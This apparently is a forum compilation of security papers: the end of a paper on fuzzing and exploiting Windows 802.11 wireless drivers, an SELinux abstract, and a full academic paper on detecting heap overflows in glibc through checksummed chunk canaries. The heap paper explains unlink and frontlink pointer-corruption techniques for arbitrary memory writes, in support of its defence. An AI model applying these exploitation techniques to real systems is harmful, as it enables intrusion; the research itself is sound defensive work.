Technology that can be used to help prevent the exploitation of user-mode vulnerabilities is now becoming commonplace on modern desktop platforms. This represents a marked improvement that should, in the long run, make the exploitation of many user-mode vulnerabilities much more difficult or even impossible. That said, there is an apparent lack of equivalent technology that can help to prevent the exploitation of kernel-mode vulnerabilities. The public justification for this lack typically centers around the argument that kernel-mode vulnerabilities are difficult to exploit and too few in number to actually warrant the integration of exploit prevention features. In actuality, sad though it may seem, the justification really boils down to a business cost issue. At present, kernel-mode vulnerabilities don't account for enough money in lost revenue to support the time investment needed to implement and test kernel-mode exploit prevention features.
In the interest of helping to balance the business cost equation, the authors have described a process that can be used to identify and exploit 802.11 wireless device driver vulnerabilities on Windows. This process includes steps that can be taken to fuzz the different ways in which 802.11 device drivers process 802.11 packets. In certain cases, flaws may be detected in a particular device driver's processing of certain packets, such as Beacons and Probe responses. When these flaws are detected, exploits can be developed using the features that have been integrated into the 3.0 version of the Metasploit Framework, which help to streamline the process of transmitting crafted 802.11 packets in an effort to gain code execution.

Through the description of this process, it is hoped that the reader will see that kernel-mode vulnerabilities can be just as easy to identify and exploit as user-mode vulnerabilities. Furthermore, it is hoped that this description will help to eliminate the false impression that all kernel-mode vulnerabilities are much more difficult to exploit (keeping in mind, of course, that there are indeed kernel-mode vulnerabilities that are difficult to exploit, in just the same way that there are user-mode vulnerabilities that are difficult to exploit). While an emphasis has been put upon 802.11 wireless device drivers, many other device drivers have the potential for exposing vulnerabilities.

Looking toward the future, there are many different opportunities for research, both from an attack and a defense point of view. From an attack point of view, there's no shortage of interesting research topics. As it relates to 802.11 wireless device driver vulnerabilities, much more advanced 802.11 protocol fuzzers can be developed that are capable of reaching features exposed by all of the protocol client states, rather than focusing on the unauthenticated and unassociated state. For device drivers in general, the development of fuzzers that attack the IOCTL interface exposed by device objects would provide good insight into a wide range of locally exposed vulnerabilities. Aside from techniques used to identify vulnerabilities, it's expected that research into techniques used to actually take advantage of different types of kernel-mode vulnerabilities will continue to evolve and become more reliable. From a defense point of view, there is a definite need for research focused on making the exploitation of kernel-mode vulnerabilities either impossible or less reliable. It will be interesting to see what the future holds for kernel-mode vulnerabilities.

Bibliography

[1] bugcheck and skape. Windows Kernel-mode Payload Fundamentals. http://www.uninformed.org/?v=3&a=4&t=sumry; accessed Dec 2, 2006.

[2] eEye. Remote Windows Kernel Exploitation - Step Into the Ring 0. http://research.eeye.com/html/Papers/download/StepIntoTheRing.pdf; accessed Dec 2, 2006.

[3] Gast, Matthew S. 802.11 Wireless Networks - The Definitive Guide. http://www.oreilly.com/catalog/802dot11/; accessed Dec 2, 2006.

[4] Lemos, Robert. Device drivers filled with flaws, threaten security. http://www.securityfocus.com/news/11189; accessed Dec 2, 2006.

[5] SoBeIt. Windows Kernel Pool Overflow Exploitation. http://xcon.xfocus.org/xcon2005/archives/2005/Xcon2005_SoBeIt.pdf; accessed Dec 2, 2006.

Sursa: http://www.uninformed.org/?v=6&a=2&t=txt
  13. Secure computing: SELinux

Michael Wikberg
Helsinki University of Technology
Michael.Wikberg@wikberg.fi

Abstract

Using mandatory access control greatly increases the security of an operating system. SELinux, which is an implementation of Linux Security Modules (LSM), implements several measures to prevent unauthorized system usage. The security architecture used is named Flask, and it provides a clean separation of security policy and enforcement. This paper is an overview of the Flask architecture and its implementation in Linux.

KEYWORDS: SELinux, MAC, Security, Kernel, Linux, LSM, TE, RBAC, MLS

Download: www.tml.tkk.fi/Publications/C/25/papers/Wikberg_final.pdf
  14. Run-time Detection of Heap-based Overflows

William Robertson, Christopher Kruegel, Darren Mutz, and Fredrik Valeur - University of California, Santa Barbara

Abstract

Buffer overflows belong to the most common class of attacks on today's Internet. Although stack-based variants are still by far more frequent and better understood, heap-based overflows have recently gained more attention. Several real-world exploits have been published that corrupt heap management information and allow arbitrary code execution with the privileges of the victim process. This paper presents a technique that protects the heap management information and allows for run-time detection of heap-based overflows. We discuss the structure of these attacks and our proposed detection scheme, which has been implemented as a patch to the GNU Lib C. We report the results of our experiments, which demonstrate the detection effectiveness and performance impact of our approach. In addition, we discuss different mechanisms to deploy the memory protection.

Introduction

Buffer overflow exploits belong to the most feared class of attacks on today's Internet. Since buffer overflow techniques have reached a broader audience, in part due to the Morris Internet worm [1] and the Phrack article by AlephOne [2], new vulnerabilities are being discovered and exploited on a regular basis. A recent survey [3] confirms that about 50% of vulnerabilities reported to CERT are buffer overflow related.

The most common type of buffer overflow attack is based on stack corruption. This variant exploits the fact that the return addresses for procedure calls are stored together with local variables on the program's stack. Overflowing a local variable can thus overwrite a return address, redirecting program flow when the function returns. This potentially allows a malicious user to execute arbitrary code.

Recently, however, buffer overflows that corrupt the heap have gained more attention. Several CERT advisories [4, 5] describe exploits that affect widely deployed programs. Heap-based overflows can be divided into two classes: one class [6] comprises attacks where the overflow of a buffer allocated on the heap directly alters the content of an adjacent memory block; the other class [7, 8] comprises exploits that alter management information used by the memory manager (i.e., the malloc and free functions). Most malloc implementations share the behavior of storing management information within the heap space itself. The central idea of the attack is to modify the management information in a way that will allow subsequent arbitrary memory overwrites. In this way, return addresses, linkage tables or application level data can be altered. Such an attack was first demonstrated by Solar Designer [9].

This paper introduces a technique that protects the management information of boundary-tag-based heap managers against malicious or accidental modification. The idea has been implemented in Doug Lea's malloc for GNU Lib C, version 2.3 [10], utilized by Linux and Hurd. It could, however, be easily extended to other systems such as various free BSD distributions. Using our modified C library, programs are protected against attacks that attempt to tamper with heap management information. It also helps to detect programming errors that accidentally overwrite memory chunks, although not as completely and verbosely as available memory debuggers. Program recompilation is not required to enable this protection.
Every application that is dynamically linked against Lib C is secured once our patch has been applied.

Related Work

Much research has been done on the prevention and detection of stack-based overflows. A well-known result is StackGuard [11], a compiler extension that inserts a 'canary' word before each function return address on the stack. When executing a stack-based attack, the intruder attempts to overflow a local buffer allocated on the stack to alter the return address of the function that is currently executing. This might permit the attacker to redirect the flow of execution and take control of the running process. By inserting a canary word between the return address and the local variables, overflows that extend into the return address will also change this canary and thus, can be detected. There are different mechanisms to prevent an attacker from simply including the canary word in his overflow and rendering the protection ineffective. One solution is to choose a random canary value on process startup (i.e., on exec) that is infeasible to guess. Another solution uses a terminator canary that consists of four different bytes commonly utilized as string terminator characters in string manipulation library functions (such as strcpy). The idea is that the attacker is required to insert these characters in the string used to overflow the buffer to overwrite the canary and remain undetected. However, the string manipulation functions will stop when encountering a terminator character and thus, the return address remains intact.

A similar idea is realized by StackShield [12]. Instead of inserting the canary into the stack, however, a second stack is kept that only stores copies of the return addresses. Before a procedure returns, the copy is compared to the original and any deviation leads to the termination of the process.

Stack-based overflows exploit the fact that management information (the function return address) and data (automatic variables and buffers) are stored together. StackGuard and StackShield are both approaches to enforcing the integrity of in-band management information on the stack. Our technique builds upon this idea and extends the protection to management information in the heap.

Other solutions to prevent stack-based overflows are not enforced by the compiler but implemented as libraries. Libsafe and Libverify [13, 14] implement and override unsafe functions of the C library (such as strcpy, fscanf, getwd). The safe versions estimate a safe boundary for buffers on the stack at run-time and check this boundary before any write to a buffer is permitted. This prevents user input from overwriting the function return address.

Another possibility is to make the stack segment non-executable [15]. Although this does not protect against the actual overflow and the modification of the return address, the solution is based on the observation that many exploits execute their malicious payload directly on the stack. This approach has the problem of potentially breaking legitimate uses such as functional programming languages that generate code during run-time and execute it on the stack. Also, gcc uses executable stacks as function trampolines for nested functions and Linux uses executable user stacks for signal handling. The solution to this problem is to detect legitimate uses and dynamically re-enable execution. However, this opens a window of vulnerability and is hard to do in a general way.

Less work has been done on protecting heap memory.
Non-executable heap extensions [16, 17] that operate similarly to their non-executable stack cousins have been proposed. However, they do not prevent buffer overflows from occurring and an attacker can still modify heap management information or overwrite function pointers. They also suffer from breaking applications that dynamically generate and execute code in the heap.

Systems that provide memory protection are memory debuggers, such as Valgrind [18] or Electric Fence [19]. These tools supervise memory access (read and write) and intercept memory management calls (e.g., malloc) to detect errors. These tools use an approach similar to ours in that they attempt to maintain the integrity of the utilized memory. However, a check is inserted on every memory access, while our approach only performs a check when allocating or deallocating memory chunks. Memory debuggers effectively prevent unauthorized memory access and stop heap-based buffer overflows. Yet, they also impose a serious performance penalty on the monitored programs, which often run an order of magnitude slower. This is not acceptable for most production systems.

A recent posting on bugtraq pointed to an article [20] that discusses several techniques to protect stack and heap memory against overflows. The presented heap protection mechanism follows similar ideas as our work as it aims at protecting heap management information. However, no details were provided and no implementation or evaluation of their technique exists.

A possibility of preventing stack-based and heap-based overflows altogether is the use of type-safe languages such as Java. Alternatively, solutions have been proposed [21] that provide safe pointers for C. All these systems can only be attacked by exploiting vulnerabilities [22, 23] in the mechanisms that enforce the type safety (e.g., the bytecode verifier). Note, however, that safe C systems typically require new compilers and recompilation of all applications to be protected.

Technique

Heap Management in GNU Lib C (glibc)

The C programming language provides no built-in facilities for performing common operations such as dynamic memory management, string manipulation or input/output. Instead, these facilities are defined in a standard library, which is compiled and linked with user applications. The GNU C library [10] is such a library that defines all library functions specified by the ISO C standard [24], as well as additional features specific to POSIX [25] and extensions specific to the GNU system [26].

Two kinds of memory allocation, static and automatic, are directly supported by the C programming language. Static allocation is used when a variable is declared as static or global. Each static or global variable defines one block of space of a fixed size. The space is allocated once, on program startup as part of the exec operation, and is never freed. Automatic allocation is used for automatic variables such as function arguments or local variables. The space for an automatic variable is automatically allocated on the stack when the compound statement containing the declaration is entered, and is freed when that compound statement is exited. A third important kind of memory allocation, dynamic allocation, is not supported by C variables but is available via glibc functions. Dynamic memory allocation is a technique in which programs determine during run-time where information should be stored.
It is needed when the amount of required memory or the lifetime of memory usage depends on factors that are not known a priori. The two basic functions provided are one to dynamically allocate a block of memory (malloc), and one to return a previously allocated block to the system (free). Other routines (such as calloc, realloc) are then implemented on top of these two procedures.

GNU Lib C uses Doug Lea's memory allocator dlmalloc [27] to implement the dynamic memory allocation functions. dlmalloc utilizes two core features, boundary tags and binning, to manage memory requests and releases on behalf of user programs. Memory management is based on 'chunks,' memory blocks that consist of application-usable regions and additional in-band management information. The in-band information, also called boundary tag, is stored at the beginning of each chunk and holds the sizes of the current and the previous chunk. This allows for coalescing two bordering unused chunks into one larger chunk, minimizing the number of unusable small chunks that result from fragmentation. Also, all chunks can be traversed starting from any known chunk in either a forward or backward direction.

Chunks that are currently not in use by the application (i.e., free chunks) are maintained in bins, grouped by size. Bins for sizes less than 512 bytes each hold chunks of only exactly one size; for sizes equal to or greater than 512 bytes, the size ranges are approximately logarithmically increasing. Searches for available chunks are processed in smallest-first, best-fit order, starting at the appropriate bin depending on the memory size requested. For unallocated chunks, the management information (boundary tag) includes two pointers for storing the chunk in a double linked list (called free list) associated with each bin. These list pointers are called forward (fd) and back (bk). On 32-bit architectures, the management information always contains two 4-byte size-information fields (the chunk size and the previous chunk size). When the chunk is unallocated, it also contains two 4-byte pointers that are utilized to manipulate the double linked list of free chunks for the binning.

This basic algorithm is known to be very efficient. Although it is based upon a search mechanism to find best fits, the use of indexing techniques (i.e., binning) and the exploitation of special cases lead to average cases requiring only a few dozen instructions, depending on the machine and the allocation pattern. A number of heuristic improvements have also been incorporated into the memory management algorithm in addition to the main techniques. These include locality preservation, wilderness preservation, memory mapping, and caching [28].

Anatomy of a Heap Overflow Exploit

The use of in-band forward and back pointers to link available chunks in bins exposes glibc's memory management routines to a security vulnerability. If a malicious user is able to overflow a dynamically allocated block of memory, that user could overwrite the next contiguous chunk header in memory. When the overflown chunk is unallocated, and thus in a bin's double linked list, the attacker can control the values of that chunk's forward and back pointers.
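For orientation, here is a rough C sketch of the 32-bit boundary tag just described, using dlmalloc-style field names (the actual glibc definition differs in detail). Note that on a 32-bit machine fd sits at offset 8 and bk at offset 12 from the chunk start, which matches the offsets used in the unlink and frontlink discussion below:

#include <stddef.h>

/* Sketch of a dlmalloc-style boundary tag on a 32-bit architecture. */
struct malloc_chunk {
    size_t prev_size;          /* size of the previous chunk, if it is free */
    size_t size;               /* size of this chunk; low bits carry status flags */
    struct malloc_chunk *fd;   /* forward pointer -- meaningful only for free chunks */
    struct malloc_chunk *bk;   /* back pointer -- meaningful only for free chunks */
};
/* For an allocated chunk, user data starts where fd would be, so only the
   two size fields are kept in-band while the chunk is in use. */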
Given this information, consider the unlink macro used by glibc shown below:

#define unlink(P, BK, FD) { \
[1] FD = P->fd; \
[2] BK = P->bk; \
[3] FD->bk = BK; \
[4] BK->fd = FD; \
}

Intended to remove a chunk from a bin's free list, the unlink routine can be subverted by a malicious user to write an arbitrary value to any address in memory. In the unlink macro shown above, the first parameter P points to the chunk that is about to be removed from the double linked list. The attacker has to store the address of a pointer (minus 12 bytes, as explained below) in the fd field of that chunk and the value to be written to that address in its bk field. At lines [1] and [2], these two fields are read and stored in the temporary variables FD and BK, respectively. At line [3], FD gets dereferenced and the address located at FD plus 12 bytes (the offset of the bk field within a boundary tag) is overwritten with the value stored in BK. This technique can be utilized, for example, to change an entry in the program's GOT (Global Offset Table) and redirect a function pointer to code of the attacker's choice.

A similar situation occurs with the frontlink macro, shown in Figure 1.

#define frontlink(A, P, S, IDX, BK, FD) { \
... \
[1] FD = start_of_bin(IDX); \
[2] while ( FD != BK && S < chunksize(FD) ) { \
[3] FD = FD->fd; \
} \
[4] BK = FD->bk; \
... \
[5] FD->bk = BK->fd = P; \
... }

Figure 1: frontlink Macro.

The task of this macro is to store the chunk of size S, pointed to by P, at the appropriate position in the double linked list of the bin with index IDX. FD is initialized with a pointer to the start of the list of the appropriate bin at line [1]. The loop at line [2] searches the double linked list to find the first chunk that is larger than P, or the end of the list, by following consecutive forward pointers (at line [3]). Note that every list stores chunks ordered by increasing sizes to facilitate a fast smallest-first search in case of memory allocations. When an attacker manages to overwrite the forward pointer of one of the traversed chunks with the address of a carefully crafted fake chunk, he could trick frontlink into leaving the loop (at line [2]) with FD pointing to this fake chunk. Next, the back pointer BK of that fake chunk would be read at line [4] and the integer located at BK plus 8 bytes (8 is the offset of the fd field within a boundary tag) would be overwritten with the address of the chunk P at line [5]. The attacker could store the address of a function pointer (minus 8 bytes) in the bk field of the fake chunk, and therefore trick frontlink into overwriting this function pointer with the address of the chunk P. Although this macro does not allow arbitrary values to be written, the attacker may be able to store valid machine code at the address of P. This code would then be executed the next time the function pointed to by the overwritten integer is called.

Figure 2: Original memory chunk structure and memory layout.

A variation on the heap overflow exploit described above is also possible, involving the manipulation of a chunk's size field instead of its list pointers. An attacker can supply arbitrary values to an adjacent chunk's size field, similar to the manipulation of the list pointers. When the size field is accessed, for example during the coalescing of two unused chunks, the heap management routines can be tricked into considering an arbitrary location in memory, possibly under the attacker's control, as the next chunk. An attacker can set up a fake chunk header at this location in order to perform an attack as discussed above.
If an attacker is, for some reason, unable to write to the list pointers of an adjacent chunk header but is able to reach the adjacent chunk's size field, this attack represents a viable alternative.

Heap Integrity Detection

In order to protect the heap, our system makes several modifications to glibc's heap manager, both in the structure of individual chunks as well as in the management routines themselves. Figure 2 depicts the original structure of a memory chunk in glibc. The first element in protecting each chunk's management information is to prepend a canary to the chunk structure, as shown in Figure 3. An additional padding field, __pad0, is also added (dlmalloc requires the size of a header of a used chunk to be a power of two). The canary contains a checksum of the chunk header seeded with a random value, described below.

Figure 3: Modified memory chunk structure and memory layout.

The second necessary element of our heap protection system is to introduce a global checksum seed value, which is held in a static variable (called __heap_magic). This variable is initialized during process startup with a random value, which is then protected against further writes by a call to mprotect. This is in contrast to stack protection schemes [29] that rely on repetitive calls to mprotect; since we only require a single invocation during process startup, we do not suffer from any related run-time performance loss associated with other schemes.

The final element of the heap protection system is to augment the heap management routines with code to manage and check each chunk's canary. Newly allocated chunks to be returned from malloc have their canary initialized to a checksum covering their memory location and size fields, seeded with the global value of __heap_magic. Note that the checksum function does not cover the list pointer fields for allocated chunks, since these fields are part of the chunk's user data section. The new chunk is then released to the application. When a chunk is returned to the heap management through a call to free, the chunk's canary is checked against the checksum calculation performed when the chunk was released to the application. If the stored value does not match the current calculation, a corruption of the management information is assumed. At this point, an alert is raised, and the process is aborted. Otherwise, normal processing continues; the chunk is inserted into a bin and coalesced with bordering free chunks as necessary. Any free list manipulations which take place during this process are prefaced with a check of the involved chunks' canary values. After the deallocated chunk has been inserted into the free list, its canary is updated with a checksum covering its memory location, size fields, and list pointers, again seeded with the value of __heap_magic.

The elements described above effectively prevent undetected writes to arbitrary locations in memory through modification of a chunk's header fields, whether through an overflow into or through direct manipulation of the chunk header fields. Each allocated chunk is protected by a randomly-seeded checksum over its memory location and size fields, and each free chunk is protected by a randomly-seeded checksum over its memory location, size fields, and list pointers. Each access of a list pointer is protected by a check to ensure that the integrity of the pointers has not been violated. Also, each use of the size field is protected. A minimal sketch of this checksum discipline is given below.
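The following sketch uses illustrative names (protected_chunk, chunk_checksum, checked_free); it is not the actual patch code, which lives inside dlmalloc itself:

#include <stddef.h>
#include <stdlib.h>

/* Random seed, set once at startup and then write-protected via mprotect
   (in this sketch it would have to sit on its own page for that to work). */
static size_t __heap_magic;

struct protected_chunk {
    size_t canary;                 /* checksum over the fields below */
    size_t __pad0;                 /* keeps the used-chunk header a power of two */
    size_t prev_size;
    size_t size;
    struct protected_chunk *fd;    /* meaningful only for free chunks */
    struct protected_chunk *bk;
};

/* Checksum for an allocated chunk: covers location and size fields only,
   since fd/bk overlap user data while the chunk is in use. */
static size_t chunk_checksum(const struct protected_chunk *p)
{
    return (size_t)p ^ p->prev_size ^ p->size ^ __heap_magic;
}

/* On free(), verify the canary before touching any list pointers. */
static void checked_free(struct protected_chunk *p)
{
    if (p->canary != chunk_checksum(p))
        abort();   /* header corrupted (overflow or double free): raise alert */
    /* ... insert into bin, coalesce with neighbors, then re-seal the canary
       with a checksum that also covers fd and bk, since the chunk is now
       on a free list ... */
}

Because the canary is re-sealed to a free-state value here, a second free() of the same chunk fails the allocated-state check, which is exactly the double-free detection described next.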
Furthermore, the checksum seed has been protected against malicious writes to guarantee that it cannot be overwritten with a value chosen by the attacker.

As a beneficial side-effect, common programming errors such as unintended heap overflows or double invocations of free are detected by this system as well. A double call to free refers to the situation where a programmer mistakenly attempts to deallocate the same chunk twice. This error is detected due to a checksum mismatch. When the chunk is deallocated for the first time, its canary is updated to a new value reflecting its position on the free list. When the second call to free is executed, the checksum is checked again, with the assumption that it is an allocated chunk. However, since the canary has been updated and the check fails, an alarm is raised.

A limitation of our approach is the fact that we do not address general pointer corruption attacks, such as subversion of an application's function pointers. The system does not guarantee the integrity of user data contained within chunks in the heap; rather, the system guarantees only that the chunk headers themselves are valid.

It is also worth noting that the heap implementation included with glibc already contains functionality that attempts to ensure the integrity of the heap management information for debugging purposes. However, use of the debugging routines incurs significant cost in a production environment. The routines perform a full scan of the heap's free lists and global state during each execution of a heap management function, and include checks unrelated to heap pointer exploitation. Furthermore, there is no guarantee that all attacks are detected. Not all list manipulations are checked, and malicious values could pass integrity checks which are not specifically intended to protect against malicious overflows. Thus, we conclude that the included debugging functionality is not suitable for protecting against the vulnerabilities that we address.

The system described above has been implemented for glibc 2.3 and glibc 2.2.9x, the pre-release versions of glibc 2.3 utilized by RedHat 8.0. However, the techniques developed for glibc are easily adaptable to other heap designs, including those shipped with the various BSD derivatives or commercial Unix implementations. Thus, further work is planned to apply this technique to other popular open systems besides glibc.

Evaluation

The purpose of this section is to experimentally verify the effectiveness of our heap protection technique. We also discuss the performance impact of our proposed extension and its stability. To assess the ability of our protection scheme, we obtained several real-world exploits that perform heap overflow attacks against vulnerable programs. These were the WU-Ftpd File Globbing Heap Corruption Vulnerability [30] against wuftpd 2.6.0, the Sudo Password Prompt Heap Overflow Vulnerability [31] against sudo 1.6.3, and the CVS Directory Request Double Free Heap Corruption Vulnerability [32] against cvs 1.11.4. In addition, we used two proof-of-concept programs presented in [8] that demonstrate examples of the exploit techniques using the unlink and the frontlink macro, respectively. We also developed a variant of the unlink exploit to demonstrate that dlmalloc's debugging routines can be easily evaded and do not provide protection comparable to our technique. All vulnerable programs were run under RedHat Linux 8.0.
The exploits have been executed three times, once with the default C library (i.e., glibc 2.2.93), once with the patched library including our heap integrity code, and once with the default C library with debugging enabled. The third run was performed to determine the effectiveness of the built-in debugging mechanisms in detecting heap-based overflows. Table 1 shows the results of our experiments. A column entry of 'shell' indicates that an exploit was successful and provided an interactive shell with the credentials of the vulnerable process. A 'segfault' entry indicates that the exploit successfully corrupted the heap, but failed to run arbitrary code (note that it might still be possible to change the exploit to gain elevated privileges). 'aborted' means that the memory corruption has been successfully detected and the process has been terminated. The results show that our technique was successful in detecting all corruptions of in-band management information, and safely terminated the processes. Note that the built-in debugging support is also relatively effective in detecting inconsistencies; however, it does not offer complete protection and imposes a significantly higher performance penalty than our patch.

[TABLE][TR] [TD]Package[/TD] [TD]glibc[/TD] [TD]glibc + heap prot.[/TD] [TD]glibc + debugging[/TD] [/TR] [TR] [TD]WU-Ftpd[/TD] [TD]shell[/TD] [TD]aborted[/TD] [TD]aborted[/TD] [/TR] [TR] [TD]Sudo[/TD] [TD]shell[/TD] [TD]aborted[/TD] [TD]aborted[/TD] [/TR] [TR] [TD]CVS[/TD] [TD]segfault[/TD] [TD]aborted[/TD] [TD]aborted[/TD] [/TR] [TR] [TD]unlink[/TD] [TD]shell[/TD] [TD]aborted[/TD] [TD]aborted[/TD] [/TR] [TR] [TD]frontlink[/TD] [TD]shell[/TD] [TD]aborted[/TD] [TD]aborted[/TD] [/TR] [TR] [TD]debug evade[/TD] [TD]shell[/TD] [TD]aborted[/TD] [TD]shell[/TD] [/TR] [/TABLE]

Table 1: Detection effectiveness.

[TABLE][TR] [TD]Package[/TD] [TD]glibc[/TD] [TD]glibc + heap prot.[/TD] [TD]glibc + debugging[/TD] [/TR] [TR] [TD]Loop[/TD] [TD]1,587[/TD] [TD]2,033 (+ 28%)[/TD] [TD]2,621 (+ 65%)[/TD] [/TR] [TR] [TD]AIM 9[/TD] [TD]5,094[/TD] [TD]5,338 (+ 5%)[/TD] [TD]7,603 (+ 49%)[/TD] [/TR] [/TABLE]

Table 2: Micro-Benchmarks.

The performance impact of our scheme has been measured using several micro- and macro-benchmarks. We are aware of the fact that the memory management routines are an important part of almost all applications, and therefore, it is necessary to implement them efficiently. It is obvious that our protection approach inflicts a certain amount of overhead, but we also claim that this overhead is tolerable for most real-world applications and is easily compensated for by the increase in security. To get a baseline for the worst slowdown that can be expected, we wrote a simple micro-benchmark that allocates and frees around four million (to be more precise, 2^22) objects of random sizes between 0 and 1024 bytes in a tight loop. The maximum size of 1024 was chosen to obtain a balanced distribution of objects in dedicated bins (for chunks with sizes less than 512 bytes) and objects in bins that cover a range of different sizes (for chunks with sizes greater than or equal to 512 bytes). We also utilized the dynamic memory benchmark present in the AIM 9 test suite [33]. Table 2 shows the average run-time in milliseconds over 100 iterations for the two micro-benchmarks. We provide results for a system with the default glibc, the glibc with heap protection, and the glibc with debugging.
For more realistic measurements that reflect the impact on real-world applications, we utilized Mindcraft's WebStone [34] and OSDB [35]. WebStone is a client-server benchmark for HTTP servers that issues a number of HTTP GET requests for specific pages on a Web server and measures the throughput and response latency of each HTTP transfer. OSDB (the Open Source Database Benchmark) evaluates the I/O throughput and general processing power of GNU/Linux systems. It is a test suite built on AS3AP, the ANSI SQL Scalable and Portable Benchmark, for evaluating the performance of database systems.

Figure 4 and Figure 5 show the response latency and throughput measurements for an increasing number of HTTP clients in the WebStone benchmark, for both the default glibc and the patched version. We used an Intel Pentium 4 with 1.8 GHz, 1 GB RAM, Linux RedHat 8.0, and a 3COM 905C-TX NIC for the experiments, running Apache 2.0.40. It can be seen that even for a hundred simultaneous clients, virtually no performance impact was recorded.

Figure 4: HTTP client response time.

Figure 5: HTTP client throughput.

Similar results have been obtained for OSDB 0.15.1. Table 3 below shows the measurements for 10 parallel clients that used our test machine (the same as above) to full capacity, running a PostgreSQL 7.2.3 database. The results show the total run-time in seconds for the single-user and multi-user tests.

[TABLE][TR] [TD]Package[/TD] [TD]glibc[/TD] [TD]glibc + heap prot.[/TD] [/TR] [TR] [TD]OSDB[/TD] [TD]6,015[/TD] [TD]6,070 (+ 0.91%)[/TD] [/TR] [/TABLE]

Table 3: OSDB benchmark.

We also attempted to assess the stability of the patched library over an extended period of time. For this purpose, the patch was installed on the lab's web server (running Apache 2.0.40) and CVS server (running cvs 1.11.60). A patched library was also used on two desktop machines, running RedHat 8.0 and Gentoo 1.4, respectively. Although the web server only receives a small number of requests, the CVS server is regularly used for our software development and the desktop machines are the workstations of two of the authors. All machines were stable and have been running without any problems for a period of several weeks.

Installation

Several methods of deploying our heap protection system have been developed, in order to accommodate various system environments and levels of desired protection. Many important security mechanisms are not applied because of the complexity and the required effort during setup. We provide different avenues that range from the installation of a pre-compiled package (with minimal effort) to a complete source rebuild of glibc.

One method is to download and install our library modifications as a source patch against glibc. Administrators can select the version appropriate to their system and apply it against a pristine glibc source tree before proceeding with the usual glibc source installation procedure. Source-based distributions, such as Gentoo Linux, can also easily incorporate these patches into their packaging system.

A second method of deployment is to create packages for various distributions of Linux that replace the system glibc image with a version containing our modifications (such as RedHat RPMs).
The advantage of this approach is that virtually all applications on the target machine will be automatically protected against heap overflow exploitation, with the exception of those applications which are statically linked against glibc or perform their own memory management. A possible disadvantage is that these applications will also experience some level of performance degradation, which could be prohibitive in some high-performance environments.

A third method of deploying our heap protection system uses packages that install a protected glibc image alongside the existing image, instead of replacing the system's glibc image altogether. A script is provided that utilizes the system loader's LD_PRELOAD functionality to substitute the protected glibc image for the system image for an individual application. This allows an administrator to selectively enable protection only for certain applications (e.g., an administrator may not feel it necessary to protect applications which cannot be executed remotely, and therefore may wish to only protect those applications which are network-accessible). This is also a suitable path for administrators who are wary of potentially destabilizing their entire system by performing a system-wide deployment of a heap modification which has not undergone the extensive real-world testing that standalone dlmalloc has.

All of the described installation methods are documented in detail on our website, located at http://www.cs.ucsb.edu/~rsg/heap/. Packages for various popular distributions and source patches can be downloaded as well.

Conclusions

This paper presents a technique for detecting heap-based overflows that tamper with in-band memory management data structures. We discuss different ways to mount such attacks and show our mechanism to detect and prevent them. We implemented a patch for glibc 2.3 that extends the utilized data structures with a canary that stores a checksum over the sensitive data. This checksum calculation involves a secret seed that makes it infeasible for an intruder to guess or fake the canary in an attack.

Experience shows that system administrators are often reluctant to adopt security measures in the systems they administer. Installing new tools may require significant effort to understand how to best apply the technology in the administrator's network, as well as investment in training end users. Additionally, applying a new tool may interfere with existing critical systems or impose unacceptable run-time overhead. This paper introduces a heap protection mechanism that increases application security in a way that is nearly transparent to the functioning of applications and is invisible to users. Applying the system to existing installations has few drawbacks. Recompilation of applications is rarely required, and the system imposes minimal overhead on application performance.

Acknowledgments

This research was supported by the Army Research Office, under agreement DAAD19-01-1-0484. The U.S. Government is authorized to reproduce and distribute reprints for Governmental purposes notwithstanding any copyright annotation thereon. The views and conclusions contained herein are those of the authors and should not be interpreted as necessarily representing the official policies or endorsements, either expressed or implied, of the Army Research Office, or the U.S. Government.

Author Information

Christopher Kruegel is working as a research postgraduate in the Reliable Software Group at the University of California, Santa Barbara.
Previously, he was an assistant professor at the Distributed Systems Group at the Technical University of Vienna. Kruegel holds the M.S. and Ph.D. degrees in computer science from the Technical University of Vienna. His research focus is on network security, with an emphasis on intrusion detection. You can contact him at chris@cs.ucsb.edu.

Darren Mutz is a doctoral student in the Computer Science department at the University of California, Santa Barbara. His research interests are in network security and intrusion detection. From 1997 to 2001 he was employed as a member of technical staff in the Planning and Scheduling Group at the Jet Propulsion Laboratory, where he engaged in research efforts focused on applying AI, machine learning, and optimization methodologies to problems in space exploration. He holds a B.S. degree in Computer Science from UCSB and can be contacted at dhm@cs.ucsb.edu.

William Robertson is a first-year PhD student in the Computer Science department at the University of California, Santa Barbara. His research interests include intrusion detection, hardening of computer systems, and routing security. He received his B.S. degree in Computer Science from UC Santa Barbara, and can be reached electronically at wkr@cs.ucsb.edu.

Fredrik Valeur is currently a Ph.D. student at UC Santa Barbara. He holds a Sivilingenioer degree in Computer Science from the Norwegian University of Science and Technology. His research interests include intrusion detection, network security and network scanning techniques. He can be contacted at fredrik@cs.ucsb.edu.

References

[1] Spafford, E., "The Internet Worm Program: An Analysis," Computer Communication Review, 1988.
[2] AlephOne, Smashing the Stack for Fun and Profit, http://www.phrack.org/phrack/49/P49-14.
[3] Wilander, J. and M. Kamkar, "A Comparison of Publicly Available Tools for Dynamic Buffer Overflow Prevention," 10th Network and Distributed System Security Symposium, 2003.
[4] CERT Advisory CA-2002-11, "Heap Overflow in Cachefs Daemon (cachefsd)."
[5] CERT Advisory CA-2002-33, "Heap Overflow Vulnerability in Microsoft Data Access Components (MDAC)."
[6] Conover, M., w00w00 on Heap Overflows, http://www.w00w00.org/files/articles/heaptut.txt.
[7] anonymous, Once upon a free(), http://www.phrack.org/phrack/57/p57-0x09.
[8] Kaempf, M., Vudo malloc tricks, http://www.phrack.org/phrack/57/p57-0x08.
[9] Designer, Solar, "JPEG COM Marker Processing Vulnerability in Netscape Browsers and Microsoft Products, and a Generic Heap-Based Buffer Overflow Exploitation Technique."
[10] The GNU C Library.
[11] Cowan, C., et al., "StackGuard: Automatic Adaptive Detection and Prevention of Buffer-Overflow Attacks," 7th USENIX Security Conference, 1998.
[12] Vendicator, Stack Shield Technical Info.
[13] Baratloo, A., N. Singh and T. Tsai, Libsafe: Protecting Critical Elements of Stacks, Avaya Labs.
[14] Baratloo, A., N. Singh and T. Tsai, "Transparent Run-time Defense Against Stack Smashing Attacks," USENIX Annual Technical Conference, 2000.
[15] Designer, Solar, Non-executable stack patch, Openwall Project.
[16] RSX: Run-time addressSpace eXtender, http://www.starzetz.com/software/rsx/index.html.
[17] PaX: Non-executable heap segments, http://pageexec.virtualave.net/index.html.
[18] Valgrind, an open-source memory debugger for x86-GNU/Linux, http://developer.kde.org/~sewardj/index.html.
